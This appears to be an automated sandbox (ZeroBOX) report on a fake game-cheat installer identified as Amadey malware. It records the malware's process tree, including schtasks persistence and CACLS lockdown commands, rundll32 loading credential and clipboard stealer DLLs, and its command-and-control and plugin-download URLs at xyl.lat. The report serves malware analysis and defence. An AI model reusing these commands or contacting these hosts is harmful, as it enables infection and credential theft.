Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Aug. 28, 2023, 5:24 p.m.	Aug. 28, 2023, 5:26 p.m.

Size	665.0KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`64f1d67b14dafea71c599e9c5498edc2`
SHA256	`57fe95c40d83f395bad243134a47ac8af1a322c7d246979562e2574036da5661`
CRC32	`5F038CD6`
ssdeep	`12288:plKxWCF+i/o4m8mMLkV4dz62TigPHRD/cYWqBGspdHtK:plKxWCP/oRMLDFpigPHlkYWpEH`
Yara	PE_Header_Zero - PE File Signature Is_DotNET_EXE - (no description) IsPE32 - (no description)

CS-Cheat-Installer.exe "C:\Users\test22\AppData\Local\Temp\CS-Cheat-Installer.exe"
912
- CS-Cheat-Installer.exe "C:\Users\test22\AppData\Local\Temp\CS-Cheat-Installer.exe"
  2052
  - bstyoops.exe "C:\Users\test22\AppData\Local\Temp\b6ba12ff32\bstyoops.exe"
    2236
    - bstyoops.exe "C:\Users\test22\AppData\Local\Temp\b6ba12ff32\bstyoops.exe"
      2300
      - schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN bstyoops.exe /TR "C:\Users\test22\AppData\Local\Temp\b6ba12ff32\bstyoops.exe" /F
        2388
      - cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "bstyoops.exe" /P "test22:N"&&CACLS "bstyoops.exe" /P "test22:R" /E&&echo Y|CACLS "..\b6ba12ff32" /P "test22:N"&&CACLS "..\b6ba12ff32" /P "test22:R" /E&&Exit
        2444
        
        cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        2516
        
        cacls.exe CACLS "bstyoops.exe" /P "test22:N"
        2556
        
        cacls.exe CACLS "bstyoops.exe" /P "test22:R" /E
        2608
        
        cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        2692
        
        cacls.exe CACLS "..\b6ba12ff32" /P "test22:N"
        2728
        
        cacls.exe CACLS "..\b6ba12ff32" /P "test22:R" /E
        2796
      - rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\c75c6c37b2d7a3\cred64.dll, Main
        2312
        
        rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\c75c6c37b2d7a3\cred64.dll, Main
        2296
      - rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\c75c6c37b2d7a3\clip64.dll, Main
        2456
explorer.exe C:\Windows\Explorer.EXE
1236

Name	Response	Post-Analysis Lookup
xyl.lat	A 37.139.129.124	37.139.129.124
files.slezer.cc	A 174.138.39.230	174.138.39.230

IP Address	Status	Action
164.124.101.2	Active	Moloch
174.138.39.230	Active	Moloch
37.139.129.124	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49177 -> 37.139.129.124:80	2027700	ET MALWARE Amadey CnC Check-In	Malware Command and Control Activity Detected
UDP 192.168.56.103:50800 -> 164.124.101.2:53	2027758	ET DNS Query for .cc TLD	Potentially Bad Traffic
TCP 192.168.56.103:49179 -> 174.138.39.230:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 174.138.39.230:443 -> 192.168.56.103:49180	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49183 -> 37.139.129.124:80	2044623	ET MALWARE Amadey Bot Activity (POST)	A Network Trojan was detected
TCP 37.139.129.124:80 -> 192.168.56.103:49183	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 37.139.129.124:80 -> 192.168.56.103:49183	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.103:49178 -> 174.138.39.230:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49176 -> 37.139.129.124:80	2044597	ET MALWARE Amadey Bot Activity (POST) M1	A Network Trojan was detected
TCP 37.139.129.124:80 -> 192.168.56.103:49176	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 37.139.129.124:80 -> 192.168.56.103:49176	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 37.139.129.124:80 -> 192.168.56.103:49176	2015744	ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)	Misc activity

Suricata TLS

No Suricata TLS

Queries for the computername (2 events)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Aug. 28, 2023, 5:24 p.m.	computer_name: TEST22-PC	1	1	0
GetComputerNameA Aug. 28, 2023, 5:25 p.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (6 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 28, 2023, 5:24 p.m.			0	0
IsDebuggerPresent Aug. 28, 2023, 5:24 p.m.			0	0
IsDebuggerPresent Aug. 28, 2023, 5:24 p.m.			0	0
IsDebuggerPresent Aug. 28, 2023, 5:24 p.m.			0	0
IsDebuggerPresent Aug. 28, 2023, 5:25 p.m.			0	0
IsDebuggerPresent Aug. 28, 2023, 5:25 p.m.			0	0

Command line console output was observed (50 out of 79 events)

Time & API	Arguments	Status	Return
WriteConsoleW Aug. 28, 2023, 5:24 p.m.	buffer: SUCCESS: The scheduled task "bstyoops.exe" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleA Aug. 28, 2023, 5:24 p.m.	buffer: A console_handle: 0x00000007	1	1
WriteConsoleA Aug. 28, 2023, 5:24 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Aug. 28, 2023, 5:24 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Aug. 28, 2023, 5:24 p.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA Aug. 28, 2023, 5:24 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Aug. 28, 2023, 5:24 p.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Aug. 28, 2023, 5:24 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Aug. 28, 2023, 5:24 p.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Aug. 28, 2023, 5:24 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Aug. 28, 2023, 5:24 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Aug. 28, 2023, 5:24 p.m.	buffer: Y console_handle: 0x00000007	1	1
WriteConsoleA Aug. 28, 2023, 5:24 p.m.	buffer: N console_handle: 0x00000007	1	1
WriteConsoleA Aug. 28, 2023, 5:24 p.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA Aug. 28, 2023, 5:24 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Aug. 28, 2023, 5:24 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Aug. 28, 2023, 5:24 p.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA Aug. 28, 2023, 5:24 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Aug. 28, 2023, 5:24 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Aug. 28, 2023, 5:24 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Aug. 28, 2023, 5:24 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Aug. 28, 2023, 5:24 p.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA Aug. 28, 2023, 5:24 p.m.	buffer: f console_handle: 0x00000007	1	1
WriteConsoleA Aug. 28, 2023, 5:24 p.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA Aug. 28, 2023, 5:24 p.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA Aug. 28, 2023, 5:24 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleW Aug. 28, 2023, 5:24 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\b6ba12ff32\bstyoops.exe console_handle: 0x00000007	1	1
WriteConsoleA Aug. 28, 2023, 5:24 p.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA Aug. 28, 2023, 5:24 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Aug. 28, 2023, 5:24 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Aug. 28, 2023, 5:24 p.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA Aug. 28, 2023, 5:24 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Aug. 28, 2023, 5:24 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Aug. 28, 2023, 5:24 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Aug. 28, 2023, 5:24 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Aug. 28, 2023, 5:24 p.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA Aug. 28, 2023, 5:24 p.m.	buffer: f console_handle: 0x00000007	1	1
WriteConsoleA Aug. 28, 2023, 5:24 p.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA Aug. 28, 2023, 5:24 p.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA Aug. 28, 2023, 5:24 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleW Aug. 28, 2023, 5:24 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\b6ba12ff32\bstyoops.exe console_handle: 0x00000007	1	1
WriteConsoleA Aug. 28, 2023, 5:24 p.m.	buffer: A console_handle: 0x00000007	1	1
WriteConsoleA Aug. 28, 2023, 5:24 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Aug. 28, 2023, 5:24 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Aug. 28, 2023, 5:24 p.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA Aug. 28, 2023, 5:24 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Aug. 28, 2023, 5:24 p.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Aug. 28, 2023, 5:24 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Aug. 28, 2023, 5:24 p.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Aug. 28, 2023, 5:24 p.m.	buffer: r console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (42 events)

Time & API	Arguments	Status	Return
CryptExportKey Aug. 28, 2023, 5:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00655090 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 28, 2023, 5:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00655090 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 28, 2023, 5:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00655090 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 28, 2023, 5:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00655150 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 28, 2023, 5:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00655150 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 28, 2023, 5:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00655150 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 28, 2023, 5:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00655290 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 28, 2023, 5:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00655290 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 28, 2023, 5:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00655290 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 28, 2023, 5:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00655290 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 28, 2023, 5:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00655190 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 28, 2023, 5:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00655190 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 28, 2023, 5:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006550d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 28, 2023, 5:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x04aff508 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 28, 2023, 5:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x04aff508 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 28, 2023, 5:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x04aff508 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 28, 2023, 5:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x04aff508 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 28, 2023, 5:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x04b29d10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 28, 2023, 5:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x04b29d10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 28, 2023, 5:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x04b29d10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 28, 2023, 5:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x04b29d10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 28, 2023, 5:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00844500 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 28, 2023, 5:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00844500 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 28, 2023, 5:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00844500 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 28, 2023, 5:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00844600 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 28, 2023, 5:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00844600 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 28, 2023, 5:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00844600 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 28, 2023, 5:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00844740 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 28, 2023, 5:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00844740 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 28, 2023, 5:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00844740 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 28, 2023, 5:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00844740 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 28, 2023, 5:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00844640 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 28, 2023, 5:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00844640 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 28, 2023, 5:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00844580 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 28, 2023, 5:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x04b2f520 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 28, 2023, 5:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x04b2f520 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 28, 2023, 5:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x04b2f520 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 28, 2023, 5:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x04b2f520 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 28, 2023, 5:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x04b59d28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 28, 2023, 5:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x04b59d28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 28, 2023, 5:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x04b59d28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 28, 2023, 5:24 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x04b59d28 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Tries to locate where the browsers are installed (2 events)

file	C:\Program Files\Mozilla Firefox\firefox.exe
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 28, 2023, 5:24 p.m.		1	1	0

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ Aug. 28, 2023, 5:25 p.m.	stacktrace: Save+0x8d973 Main-0x1478d cred64+0x91e43 @ 0x7fef2c01e43 Save+0x8f58b Main-0x12b75 cred64+0x93a5b @ 0x7fef2c03a5b Save+0x90613 Main-0x11aed cred64+0x94ae3 @ 0x7fef2c04ae3 Save+0x909bf Main-0x11741 cred64+0x94e8f @ 0x7fef2c04e8f Save+0xa1ae8 Main-0x618 cred64+0xa5fb8 @ 0x7fef2c15fb8 Main+0x65 cred64+0xa6635 @ 0x7fef2c16635 rundll32+0x2f42 @ 0xffdb2f42 rundll32+0x3b7a @ 0xffdb3b7a BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76fd652d RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x776ec521 exception.instruction_r: 42 38 3c 00 75 f7 48 8b d0 48 8d 4c 24 50 e8 fa exception.instruction: cmp byte ptr [rax + r8], dil exception.exception_code: 0xc0000005 exception.symbol: Save+0x8d973 Main-0x1478d cred64+0x91e43 exception.address: 0x7fef2c01e43 registers.r14: 0 registers.r15: 0 registers.rcx: 1099511627775 registers.rsi: 0 registers.r10: 668 registers.rbx: 0 registers.rsp: 1244624 registers.r11: 1239520 registers.r8: 0 registers.r9: 231940292619 registers.rdx: 3322704 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 1 registers.r13: 0	1	0	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (4 events)

suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST http://xyl.lat/2BfwEnWXSKj6KgTm/index.php?scr=1
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST http://xyl.lat/2BfwEnWXSKj6KgTm/index.php
suspicious_features	GET method with no useragent header	suspicious_request	GET http://xyl.lat/2BfwEnWXSKj6KgTm/Plugins/cred64.dll
suspicious_features	GET method with no useragent header	suspicious_request	GET http://xyl.lat/2BfwEnWXSKj6KgTm/Plugins/clip64.dll

Performs some HTTP requests (4 events)

request	POST http://xyl.lat/2BfwEnWXSKj6KgTm/index.php?scr=1
request	POST http://xyl.lat/2BfwEnWXSKj6KgTm/index.php
request	GET http://xyl.lat/2BfwEnWXSKj6KgTm/Plugins/cred64.dll
request	GET http://xyl.lat/2BfwEnWXSKj6KgTm/Plugins/clip64.dll

Sends data using the HTTP POST Method (2 events)

request	POST http://xyl.lat/2BfwEnWXSKj6KgTm/index.php?scr=1
request	POST http://xyl.lat/2BfwEnWXSKj6KgTm/index.php

Resolves a suspicious Top Level Domain (TLD) (1 event)

domain

files.slezer.cc

description

Cocos Islands domain TLD

Allocates read-write-execute memory (usually to unpack itself) (50 out of 57 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 912 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00360000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 912 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 912 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f31000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 912 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f32000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 912 region_size: 262144 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00580000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 912 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00580000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 912 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00442000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 912 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0045c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 912 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00980000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 912 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004fb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 912 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004f7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 912 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004f5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 912 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004e6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 912 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 912 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 912 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0044a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 912 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0099f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 912 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00990000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 912 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00981000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 912 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00982000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 912 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00983000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 912 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00984000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 912 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00985000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 912 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0045a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 912 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0045d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 912 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00986000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
